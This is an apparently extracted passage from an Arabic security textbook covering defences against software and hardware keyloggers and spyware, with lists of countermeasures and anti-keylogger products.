‫ﻟﻠدﻓﺎع ﺿد ﻛﯾﻠوﺟرز‪:‬‬
‫‪ -‬ﺗﺛﺑﯾت ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت وﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﺗﺟﺳس‪ .‬ﺣﯾث أن اﻟﻔﯾروﺳﺎت‪ ،‬واﻟﺗرواﺟن‪ ،‬واﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ اﻷﺧرى ھﻲ‬
‫وﺳﺎﺋط واﻟﺗﻲ ﻣن ﺧﻼﻟﮭﺎ ﺗﻐزو ﺑرﻣﺟﯾﺎت اﻟﻛﯾﻠوﺟرز ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ .‬ﻣﻛﺎﻓﺢ اﻟﻔﯾروﺳﺎت وﻣﻛﺎﻓﺢ اﻟﺗﺟﺳس ھﻲ ﺧط اﻟدﻓﺎع اﻷول ﺿد‬
‫ﻛﯾﻠوﺟرز‪ .‬اﺳﺗﺧدام ﺗطﺑﯾﻘﺎت ﻟﺗﻧظﯾف ﻛﻠوﺟر ﻣﺗﺎﺣﺔ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪ ،‬اﻟﻛﯾﻠوﺟرز اﻟﺗﻲ ﯾﺗم اﻟﻛﺷف ﻋﻧﮫ ﻣن ﻗﺑل ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ‬
‫اﻟﻔﯾروﺳﺎت ﯾﻣﻛن ﺣذﻓﮫ ﻣن اﻟﻛﻣﺑﯾوﺗر‪.‬‬
‫‪ -‬ﺗﺛﺑﯾت ‪ ،host-based IDS‬واﻟذي ﯾﻣﻛﻧﮫ رﺻد اﻟﻧظﺎم اﻟﺧﺎص ﺑك وﺗﻌطﯾل ﺗﺛﺑﯾت ﻛﯾﻠوﺟرز‪.‬‬
‫‪ -‬ﺗﻔﻌﯾل ﺟدران اﻟﺣﻣﺎﯾﺔ )‪(Firewall‬ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ .‬اﻟﺟدران اﻟﻧﺎرﯾﺔ )‪ (Firewall‬ﺗﻣﻧﻊ اﻟوﺻول إﻟﻰ ﺧﺎرج اﻟﻛﻣﺑﯾوﺗر‪.‬‬
‫اﻟﺟدران اﻟﻧﺎرﯾﺔ ﺗﻣﻧﻊ اﻧﺗﻘﺎل اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺳﺟﻠﺔ إﻟﻰ اﻟﻣﮭﺎﺟم‪.‬‬
‫‪ -‬ﺗﺗﺑﻊ اﻟﺑراﻣﺞ اﻟﺗﻲ ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ .‬اﺳﺗﺧدام اﻟﺑرﻣﺟﯾﺎت اﻟﺗﻲ ﺗﻔﺣص ﺑﺷﻛل ﻣﺗﻛرر وﺗراﻗب اﻟﺗﻐﯾرات اﻟﺗﻲ طرأت‬
‫ﻋﻠﻰ اﻟﻧظﺎم أو اﻟﺷﺑﻛﺔ‪ .‬ﻛﯾﻠوﺟرز ﯾﻣﯾل ﻋﺎدة ﻟﻠﺗﺷﻐﯾل ﻓﻲ اﻟﺧﻠﻔﯾﺔ‪.‬‬
‫‪ -‬اﻟﺣﻔﺎظ ﻋﻠﻰ أﻧظﻣﺔ اﻷﺟﮭزة اﻟﺧﺎﺻﺔ ﺑك آﻣﻧﺔ ﻓﻲ ﺑﯾﺋﺔ ﻣؤﻣﻧﺔ‪ ،‬وﯾﻔﺿل اﻟﺗﺣﻘﻖ ﻛﺛﯾرا ﻣن ﻛﺎﺑﻼت ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ اﻟﻣوﺻﻠﺔ‪ ،‬ﻣﻧﻔذ‬
‫‪ ،USB‬وأﻟﻌﺎب اﻟﻛﻣﺑﯾوﺗر ﻣﺛل ‪ PS2‬اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧدﻣﮭﺎ ﻟﺗﺛﺑﯾت ﺑراﻣﺞ ﻛﻠوﺟر‪.‬‬
‫‪ -‬اﻟﺗﻌرف ﻋﻠﻰ وﺣذف رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻻﺣﺗﯾﺎﻟﯾﺔ )‪ (phishing emails‬ﻷن ﻣﻌظم اﻟﻣﮭﺎﺟﻣﯾن ﯾﺳﺗﺧدﻣوا رﺳﺎﺋل اﻟﺑرﯾد‬
‫اﻹﻟﻛﺗروﻧﻲ اﻟﺧﺎدﻋﺔ ﻛوﺳﯾﻠﺔ ﻟﻧﻘل ﺑرﻣﺟﯾﺎت اﻟﻛﯾﻠوﺟرز ﻟﻧظﺎم اﻟﺿﺣﯾﺔ‪.‬‬
‫‪ -‬ﺗﻔﻌﯾل ‪ pop-up blockers‬وﺗﻔﺎدى ﻓﺗﺢ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻏﯾر اﻟﻣرﻏوب ﻓﯾﮭﺎ وﻣرﻓﻘﺎﺗﮭﺎ‪.‬‬
‫‪ -‬ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت وﻣﻛﺎﻓﺣﺔ اﻟﺗﺟﺳس ﻗﺎدر ﻋﻠﻰ اﻟﻛﺷف ﻋﻠﻰ أي ﺷﻲء ﯾﺗم ﺗﺛﺑﯾﺗﮫ ﻋﻠﻰ اﻟﻧظﺎم‪ ،‬وﻟﻛن ﻣن اﻷﻓﺿل اﻟﻛﺷف ﻋن‬
‫ھذه اﻟﺑراﻣﺞ ﻗﺑل أن ﯾﺗم ﺗﺛﺑﯾﺗﮭﺎ‪ .‬ﻓﺣص اﻟﻣﻠﻔﺎت ﺟﯾدا ﻗﺑل ﺗﺛﺑﯾﺗﮭﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر واﺳﺗﺧدام ‪ registry editor‬أو ‪process‬‬
‫‪ explorer‬ﻟﻠﺗﺣﻘﻖ ﻣن اﻟﻣﺗﻠﺻﺻﯾن‪.‬‬
‫‪ -‬اﺳﺗﺧدام ‪ USB‬ﻻﯾف ﻣﺣﻣﻲ ﺿد اﻟﻛﺗﺎﺑﺔ او ‪ CD/DVD‬ﻻﯾف ﻹﻋﺎدة ﺗﺷﻐﯾل اﻟﻛﻣﺑﯾوﺗر‪.‬‬
‫‪ -‬اﺳﺗﺧدام ﺑراﻣﺞ ﻣلء اﻟﻧﻣوذج اﻟﺗﻠﻘﺎﺋﻲ )‪ (automatic form-filling programs‬أو ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ اﻻﻓﺗراﺿﯾﺔ )‪(virtual keyboard‬‬
‫ﻹدﺧﺎل أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﻣرور ﻷﻧﮭﺎ ﺗﺟﻧب اﻟﺗﻌرض ﻣن ﺧﻼل ﻛﯾﻠوﺟرز‪ .‬ﺑراﻣﺞ ﻣلء اﻟﻧﻣوذج ﺗﻠﻘﺎﺋﯾﺎ ﺳوف ﺗزﯾل‬
‫اﻟﺗﻌرض ﻻﺳﺗﺧدام ﻛﺗﺎﺑﺔ اﻟﺗﻔﺎﺻﯾل اﻟﺷﺧﺻﯾﺔ اﻟﺧﺎﺻﺔ ﺑك واﻟﻣﺎﻟﯾﺔ‪ ،‬أو اﻟﺳرﯾﺔ ﻣﺛل أرﻗﺎم ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن وﻛﻠﻣﺎت اﻟﺳر ﻣن ﺧﻼل‬
‫ﻟوﺣﺎت اﻟﻣﻔﺎﺗﯾﺢ‪.‬‬
‫‪ -‬اﺳﺗﺧدام ﺑراﻣﺞ ﺗدﺧل اﻟﻣﻔﺎﺗﯾﺢ)‪ ، (keystroke interference‬واﻟذي ﯾدرج اﻷﺣرف اﻟﻌﺷواﺋﯾﺔ ﻣﻊ ﻛل ﺿﻐطﺔ ﻣﻔﺎﺗﯾﺢ‪.‬‬
‫‪ -‬اﺳﺗﺧدام أداة اﻟﻣﺳﺎﻋدة ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻟﻠﻣﻌﺎﻗﯾن )‪ (Windows on-screen keyboard accessibility‬ﻹدﺧﺎل ﻛﻠﻣﺔ اﻟﻣرور أو‬
‫أي ﻣﻌﻠوﻣﺎت ﺳرﯾﺔ أﺧرى‪ .‬ﯾﻣﻛﻧك اﻟﺣﻔﺎظ ﻋﻠﻰ ﺳرﯾﺔ اﻟﻣﻌﻠوﻣﺎت اﻟﺧﺎﺻﺔ ﺑك ﻷﻧﮫ ھﻧﺎ ﯾﺗم اﺳﺗﺧدام اﻟﻣﺎوس ﻹدﺧﺎل أي ﻣﻌﻠوﻣﺎت ﻣﺛل‬
‫ﻛﻠﻣﺎت اﻟﺳر‪ ،‬وأرﻗﺎم ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن‪ ،‬اﻟﺦ ﻓﻲ ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﺑدﻻ ﻣن ﻛﺗﺎﺑﺔ ﻛﻠﻣﺎت اﻟﺳر ﺑﺎﺳﺗﺧدام ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪.‬‬
‫‪ -‬ا ﺗﻧﻘر ﻋﻠﻰ وﺻﻼت ﻓﻲ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻏﯾر اﻟﻣرﻏوب ﻓﯾﮭﺎ أو اﻟﻣﺷﺑوھﺔ اﻟﺗﻲ ﻗد ﺗﺷﯾر ﻟك اﻟﻣواﻗﻊ اﻟﺧﺑﯾﺛﺔ‪.‬‬

‫اﻟﺗداﺑﯾر اﻟﻣﺿﺎدة اﻟﻣذﻛورة ﺣﺗﻰ اﻵن ﺗﺳﺗﺧدم ﻟﺗوﻓﯾر اﻟﺣﻣﺎﯾﺔ ﺿد ﺑرﻣﺟﯾﺎت اﻟﻛﯾﻠوﺟرز‪ .‬أﻣﺎ اﻵن ﺳوف ﻧﻧﺎﻗش اﻟﺗداﺑﯾر اﻟﻣﺿﺎدة ﻟﻠﺣﻣﺎﯾﺔ ﺿد‬
‫أﺟﮭزة اﻟﻛﯾﻠوﺟرز‪ .‬أﺟﮭزة اﻟﻛﯾﻠوﺟرز ھو اﻟﺟﮭﺎز اﻟذي ﯾﺳﺟل ﻛل ﺿﻐطﺔ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻋﻠﻰ ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ اﻟﻛﻣﺑﯾوﺗر ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ‪ .‬ﯾﺗم‬
‫ﺗوﺻﯾل ھذا اﻟﺟﮭﺎز ﻓﻲ اﻟﻣﻛﺎن ﻣﺎ ﺑﯾن ﺣﺎﻟﺔ اﻟﻛﻣﺑﯾوﺗر وﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪ .‬ﯾﺗم اﺳﺗﺧدام ﻛﻠوﻏر ﻛﺗطﺑﯾﻘﺎت اﻟﻣﺷروﻋﺔ ﻓﺿﻼ ﻋن اﻟﻣﮭﺎﺟﻣﯾن اﻟذﯾن‬
‫ﯾﺳﺗﺧدﻣوھﺎ ﻷﻏراض ﺧﺎدﻋﺔ ﻣﺛل ﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﺳر وأرﻗﺎم اﻟﺣﺳﺎﺑﺎت اﻟﻣﺻرﻓﯾﺔ وأرﻗﺎم اﻟﮭﺎﺗف‪ ،‬وھﻠم ﺟرا‪ .‬ﻟﻠدﻓﺎع ﻋن اﻟﻧظﺎم اﻟﺧﺎص ﺑك‬
‫ﺿد ﻛﯾﻠوﺟرز‪ ،‬ﻧﺗﺑﻊ اﻟﻣﺿﺎدات اﻟﻣدرﺟﺔ ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬

‫ﺗﻘﯾﯾد اﻟوﺻول اﻟﻔﻌﻠﻲ إﻟﻰ أﻧظﻣﺔ اﻟﻛﻣﺑﯾوﺗر اﻟﺣﺳﺎﺳﺔ‪.‬‬ ‫‪-‬‬


‫ﻓﺣص دوري ﻟواﺟﮭﺔ ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻟﺿﻣﺎن ﻋدم وﺟود ﻣﻛوﻧﺎت إﺿﺎﻓﯾﺔ ﯾﺗم ﺗوﺻﯾﻠﮭﺎ ﺑﻛﺑل ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪.‬‬ ‫‪-‬‬
‫ﻗﻔل ﻏرﻓﺔ اﻟﺧﺎدم‪.‬‬ ‫‪-‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪430‬‬

‫ﻓﺣص دوري ﻟﻛل أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر واﻟﺗﺣﻘﻖ ﻣﺎ إذا ﻛﺎن ھﻧﺎك أي ﺟﮭﺎز ﻣﺗﺻل ﺑﮭم‪.‬‬ ‫‪-‬‬

‫‪Anti-Keyloggers‬‬
‫ﻣﻛﺎﻓﺣﺔ ﻛﯾﻠوﺟرز )‪ ،(Anti-Keyloggers‬وﺗﺳﻣﻰ أﯾﺿﺎ ‪ ،anti-keystroke loggers‬ﺻﻣﻣت ﺧﺻﯾﺻﺎ ﻟﻛﺷف وﺗﻌطﯾل ﺑراﻣﺞ ﺗﺳﺟﯾل‬
‫ﺿرﺑﺔ اﻟﻣﻔﺗﺎح)‪ . (keystroke logger‬ﺻﻣﻣت ﻣﺿﺎدات ﻛﯾﻠوﺟرز ﺧﺻﯾﺻﺎ ﻟﻐرض اﻟﻛﺷف ﻋن ﺑرﻣﺟﯾﺎت ﻛﯾﻠوﺟرز‪ .‬اﻟﻌدﯾد ﻣن اﻟﻣﻧظﻣﺎت‬
‫اﻟﻛﺑﯾرة‪ ،‬واﻟﻣؤﺳﺳﺎت اﻟﻣﺎﻟﯾﺔ‪ ،‬واﻟﺻﻧﺎﻋﺎت وﺷرﻛﺎت اﻷﻟﻌﺎب ﻋﺑر اﻹﻧﺗرﻧت‪ ،‬ﺑﺎﻹﺿﺎﻓﺔ اﻟﻰ اﻻﻓراد ﯾﺳﺗﺧدﻣوا )‪(Anti-Keyloggers‬‬
‫ﻣﺿﺎدات ﻛﯾﻠوﺟرز ﻟﺣﻣﺎﯾﺔ ﺧﺻوﺻﯾﺎﺗﮭم أﺛﻧﺎء اﺳﺗﺧدام اﻷﻧظﻣﺔ‪ .‬ھذه اﻟﺑراﻣﺞ ﺗﻣﻧﻊ ﻛﻠوﺟر ﻣن ﺗﺳﺟﯾل ﻛل ﺿﻐطﺔ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻣن ﻗﺑل اﻟﺿﺣﯾﺔ‬
‫وﯾﺑﻘﻲ ﻋﻠﻰ ﺟﻣﯾﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﺷﺧﺻﯾﺔ آﻣﻧﺔ وﻣﺄﻣوﻧﺔ اﻵن‪ .‬ﻣﺿﺎد اﻟﻛﯾﻠوﺟرز ﯾﻔﺣص ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ ،‬ﯾﻛﺗﺷف‪ ،‬وﯾزﯾل ﺑراﻣﺞ ﺗﺳﺟﯾل ﺿرﺑﺔ‬
‫اﻟﻣﻔﺗﺎح‪ .‬إذا ﻛﺎن اﻟﺑرﻧﺎﻣﺞ )ﻣﺿﺎدة اﻟﻛﯾﻠوﺟرز( ﯾﺟد أي ﺑرﻧﺎﻣﺞ ﯾﺳﺟل أي ﺿﻐطﺔ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك‪ ،‬ﻓﺈﻧﮫ ﯾﺣدده ﻋﻠﻰ اﻟﻔور‬
‫وإزاﻟﺗﮫ‪ ،‬ﺳواء ﻛﺎﻧت ﺑرﻧﺎﻣﺞ ﺗﺳﺟﯾل ﺿﻐط اﻟﻣﻔﺎﺗﯾﺢ ﻣﺷروﻋﺔ أو ﺑرﻧﺎﻣﺞ ﺗﺳﺟﯾل اﻟﺿﻐطﺔ ﻏﯾر ﺷرﻋﯾﺔ‪.‬‬

‫ﺑﻌض ﻣﺿﺎدات اﻟﻛﯾﻠوﺟرز ﺗﻛﺷف ﻋن وﺟود اﻟﻛﯾﻠوﺟرز اﻟﻣﺧﻔﻲ ﻋن طرﯾﻖ ﻣﻘﺎرﻧﺔ ﻛل اﻟﻣﻠﻔﺎت ﻓﻲ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر ﻣﻘﺎﺑل ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ﺗوﻗﯾﻊ‬
‫ﻛﯾﻠوﺟرز )‪ (signature database‬واﻟﺑﺣث ﻋن أوﺟﮫ اﻟﺗﺷﺎﺑﮫ‪ .‬ﺑﻌض اﻟﻣﺿﺎدة اﻷﺧرى ﻟﻠﻛﯾﻠوﺟرز ﺗﻛﺷف ﻋن وﺟود ﻛﯾﻠوﺟرز اﻟﻣﺧﺑﺄة ﻋن‬
‫طرﯾﻖ ﺣﻣﺎﯾﺔ ﻣﻠف ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ )‪ (keyboard driver‬واﻟﻛﯾرﻧل ﻣن اﻟﺗﻼﻋب‪ .‬ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ اﻻﻓﺗراﺿﯾﺔ )‪ (virtual keyboard‬أو‬
‫‪ touchscreen‬ﯾﺟﻌل ﻣﮭﻣﺔ اﻟﺗﻘﺎط اﻟﻣﻔﺎﺗﯾﺢ ﻣن ﺑرﻣﺟﯾﺎت اﻟﺗﺟﺳس اﻟﺧﺑﯾﺛﺔ أو ﺑراﻣﺞ اﻟﺗروﺟﺎن ﺻﻌﺑﺔ‪.‬‬

‫‪Anti-Keylogger: Zemana AntiLogger‬‬

‫اﻟﻣﺻدر‪http://www.zemana.com :‬‬
‫‪Zemana AntiLogger‬ھو ﺑرﻧﺎﻣﺞ أﻣﻧﻰ ﻋﺎﻟﻲ اﻷداء واﻟذى ﯾﻘوم ﺑﺣﻣﺎﯾﺔ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك ﻣن ھﺟﻣﺎت ﻛﻠوﺟر واﻟﺑراﻣﺞ‬
‫اﻟﺧﺑﯾﺛﺔ‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ ﺣﻣﺎﯾﺔ ھوﯾﺗك‪ AntiLogger.‬ﺗﻘوم ﺑﺎﻟﻛﺷف ﻋن اﻟﺑراﻣﺞ اﻟﺿﺎرة ﻓﻲ اﻟوﻗت اﻟذي ﺗﮭﺎﺟم اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﺑدﻻ ﻣن اﻟﻛﺷف‬
‫ﻋﻧﮭﺎ اﻟﻣﻌﺗﻣد ﻋﻠﻰ ﺑﺻﻣﺔ اﻟﺗوﻗﯾﻊ )‪ .(signature fingerprint‬ﺣﯾث إﻧﮫ ﺳوف ﯾﻘوم ﺑﺗﻧﺑﯾﮭك إذا ﺣﺎوﻟت أي ﻣن اﻟﺑرﻧﺎﻣﺞ اﻟﺧﺑﯾﺛﺔ اﻟﻘﯾﺎم‬
‫ﺑﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻣن اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪ ،‬او اﻟﺗﻘﺎط ﺻوره ﻟﻠﺷﺎﺷﺔ‪ ،‬او اﻟوﺻول إﻟﻰ اﻟﺣﺎﻓظﺔ اﻟﺧﺎﺻﺔ ﺑك‪ ،‬واﻟﻣﯾﻛروﻓون‪ ،‬او ﻛﺎﻣﯾرا‬
‫اﻟوﯾب‪ ،‬أو إﻗﺣﺎم ﻧﻔﺳﮫ ﻓﻲ أي اﻟﻣﻧﺎطﻖ اﻟﺣﺳﺎﺳﺔ ﻓﻲ اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪.‬‬
‫‪ Zemana AntiLogger‬ﯾوﻓر اﻟﺣﻣﺎﯾﺔ ﺿد اﻟﺗﮭدﯾدات اﻟﻣﺧﺗﻠﻔﺔ ﻣﺛل ﺗﺳﺟﯾل ‪ ،(SSL Logger) SSL‬وﺗﺳﺟﯾل ﻛﺎﻣﯾرا وﯾب )‪(webcam logger‬‬
‫‪ ،‬ﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ)‪ ، (KeyLogger‬ﺗﺳﺟﯾل اﻟﺣﺎﻓظﺔ )‪ ، (clipboard logger‬ﺗﺳﺟﯾل اﻟﺷﺎﺷﺔ )‪ ، (screen logger‬واﻟﺑرﻣﺟﯾﺎت‬
‫اﻟﺗﺟﺳﺳﯾﺔ )‪ ،(spyware‬ﻣﺻرﻓﻲ ‪ ،SSL‬واﻟﺗرواﺟن ‪ ،‬اﻟﺦ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪431‬‬

‫‪Anti-Keyloggers: other tools‬‬

‫ﻣﺿﺎدات ﻛﯾﻠوﺟرز ﺗﻘوم ﺑﺗﺄﻣﯾن اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﻣن ھﺟﻣﺎت ﺑراﻣﺞ اﻟﺗﺟﺳس‪ ،‬ﺑرﻣﺟﯾﺎت ﻛﯾﻠوﺟرز‪ ،‬وأﺟﮭزة ‪ .Keyloggers‬ﯾﺗم ﺳرد ﺑﻌض‬
‫ﻣن ﻣﺿﺎدة اﻟﻛﯾﻠوﺟرز اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﺗﺄﻣﯾن اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﺿد اﻟﺗﮭدﯾدات اﻟﻣﺧﺗﻠﻔﺔ ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪Anti-Keylogger available at http://www.anti-keyloggers.com‬‬
‫‪PrivacyKeyboard available at http://www.anti-keylogger.com‬‬
‫‪Defensewall HIPS available at http://www.softsphere.com‬‬
‫‪Keyscrambler available at http://www.qfxsoftware.com‬‬
‫‪I Hate Keyloggers available at http://dewasoft.com‬‬
‫‪SpyShelter STOP-LOGGER available at http://www.spyshelter.com‬‬
‫‪PrivacyKeyboard available at http://www.privacykeyboard.com‬‬
‫‪Elite Anti Keylogger available at http://www.elite-antikeylogger.com‬‬
‫‪CoDefender available at http://www.encassa.com‬‬

‫‪How to Defend Against Spyware‬‬

‫‪ Spyware‬ھﻲ ﺑراﻣﺞ ﺧﺑﯾﺛﺔ اﻟﺗﻲ ﺗﻘوم ﺑﺎﻟﺗﺛﺑﯾت ﻋﻠﻰ اﻟﻧظﺎم اﻟﻣﺳﺗﺧدم دون ﻋﻠم اﻟﻣﺳﺗﺧدم وﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ ﻣﺛل اﻟﺑﯾﺎﻧﺎت اﻟﺷﺧﺻﯾﺔ‬
‫وﺳﺟﻼت اﻟدﺧول‪ ،‬اﻟﺦ‪ Spyware .‬ﺗﺄﺗﻲ ﻣن ﺛﻼﺛﺔ ﻣﺻﺎدر أﺳﺎﺳﯾﺔ ھﻲ‪ :‬واﺣدة ﻣن اﻟﻣﺻﺎدر اﻟرﺋﯾﺳﯾﺔ ﻣن ﺧﻼل ﺗﺣﻣﯾل اﻟﺑرﻣﺟﯾﺎت اﻟﺣرة‪،‬‬
‫واﻟﻣﺻدر اﻟﺛﺎﻧﻲ ﻟﺑراﻣﺞ اﻟﺗﺟﺳس ﻣن ﺧﻼل ﻣرﻓﻘﺎت اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬واﻟﻣﺻدر اﻟﺛﺎﻟث ﻣن ﺑراﻣﺞ اﻟﺗﺟﺳس ھﻲ اﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﺛﺑﯾت ﺑراﻣﺞ‬
‫اﻟﺗﺟﺳس ﺗﻠﻘﺎﺋﯾﺎ ﻋﻧد زﯾﺎرﺗﮭﺎ‪ .‬ھﻧﺎ طرق ﻟﻠدﻓﺎع ﺿد ﺑراﻣﺞ اﻟﺗﺟﺳس ﻛﺎﻻﺗﻰ‪:‬‬
‫‪ -‬ﻻ ﺗﻘوم أﺑدا ﺑﺿﺑط ﻣﺳﺗوى أﻣن اﻹﻧﺗرﻧت اﻟﺧﺎﺻﺔ ﺑك اﻟﻰ ﻣﻧﺧﻔﺿﺔ ﺟدا )‪ (too low‬ﻷﻧﮫ ﯾوﻓر اﻟﻌدﯾد ﻣن اﻟﻔرص ﻟﺑراﻣﺞ اﻟﺗﺟﺳس‬
‫ﻟﯾﺗم ﺗﺛﺑﯾﺗﮭﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك‪ .‬ﻟذﻟك‪ ،‬ﯾﺗم ﺗﻌﯾﯾن إﻋداد اﻷﻣﺎن داﺋﻣﺎ ﻟﻣﺳﺗﻌرض اﻹﻧﺗرﻧت اﻟﺧﺎص ﺑك إﻣﺎ ﻋﺎﻟﯾﺔ أو‬
‫ﻣﺗوﺳطﺔ ﻟﺣﻣﺎﯾﺔ اﻟﻛﻣﺑﯾوﺗر ﻣن ﺑراﻣﺞ اﻟﺗﺟﺳس‪.‬‬
‫‪ -‬ﺟدار اﻟﺣﻣﺎﯾﺔ ﯾﻌزز ﻣﺳﺗوى اﻷﻣن ﻟﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك‪.‬‬
‫‪ -‬ﻻ ﺗﻔﺗﺢ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣﺷﺑوھﺔ وﻣرﻓﻘﺎت اﻟﻣﻠﻔﺎت اﻟواردة ﻣن ﻣرﺳﻠﯾن ﻏﯾر ﻣﻌروﻓﯾن‪ .‬ﺣﯾث أن ھﻧﺎك اﺣﺗﻣﺎل ﻛﺑﯾر أن‬
‫ﺗﺣﺻل ﻋﻠﻰ ﻓﯾروس‪ ،freeware ،‬أو ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر‪ .‬ﻻ ﺗﻔﺗﺢ ﻣواﻗﻊ ﻏﯾر ﻣﻌروﻓﺔ اﻟﺗﻲ ﯾﺗم ﺗﻘدﯾﻣﮭﺎ ﻓﻲ رﺳﺎﺋل اﻟﺑرﯾد‬
‫اﻟﻣزﻋﺞ‪ ،‬أو ﺑواﺳطﺔ ﻣﺣرﻛﺎت اﻟﺑﺣث‪ ،‬أو ﺗﻌرض ﻓﻲ ﻧواﻓذ اﻟﻣﻧﺑﺛﻘﺔ ﻷﻧﮭﺎ ﻗد ﺗﻛون ﺗﺿﻠﯾل ﻟك ﻟﺗﺣﻣﯾل ﺑراﻣﺞ اﻟﺗﺟﺳس‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪432‬‬

‫ﺗﺛﺑﯾت اﻟﺑراﻣﺞ اﻟﻣﻛﺎﻓﺣﺔ ﻟﺗطﺑﯾﻘﺎت اﻟﺗﺟﺳس)‪ . (Anti-spyware software‬ﺣﯾث ﺗﻘوم ﺑﺣﻣﺎﯾﺗك ﺿد ﺑراﻣﺞ اﻟﺗﺟﺳس‪.‬‬ ‫‪-‬‬
‫‪Antispyware‬ھو ﺧط اﻟدﻓﺎع اﻷول ﺿد ﺑراﻣﺞ اﻟﺗﺟﺳس‪ .‬ھذه اﻟﺑراﻣﺞ ﺗﻣﻧﻊ ﺑراﻣﺞ اﻟﺗﺟﺳس اﻟﺗﻲ ﯾﺗم ﺗﺛﺑﯾﺗﮭﺎ ﻋﻠﻰ اﻟﻧظﺎم اﻟﺧﺎص‬
‫ﺑك‪ .‬ﻓﺈﻧﮫ ﯾﻘوم ﺑﻔﺣص دوري ﻟﻠﻧظﺎم اﻟﺧﺎص ﺑك وﯾﺣﻣﻲ ﺟﮭﺎزك ﻣن ﺑراﻣﺞ اﻟﺗﺟﺳس‪.‬‬
‫ﺗﺣﻘﻖ ﺑﺎﻧﺗظﺎم ﺗﻘﺎرﯾر إدارة اﻟﻣﮭﺎم )‪ (Task Manager reports‬وﺗﻘﺎرﯾر إدارة اﻻﻋداد)‪. (MS Configuration Manager reports‬‬ ‫‪-‬‬
‫ﺗﺟﻧب اﺳﺗﺧدام أي ﻧظﺎم اﻟﻛﻣﺑﯾوﺗر اﻟذي ﻟﯾس ﺗﺣت ﺳﯾطرﺗك‪.‬‬ ‫‪-‬‬
‫ﺗﺣدﯾث ﻣﻠﻔﺎت ﺗﻌرﯾف اﻟﻔﯾروﺳﺎت وﺗﻔﺣص اﻟﻧظﺎم ﺑﺣﺛﺎ ﻋن ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ أﺳﺎس ﻣﻧﺗظم‪.‬‬ ‫‪-‬‬
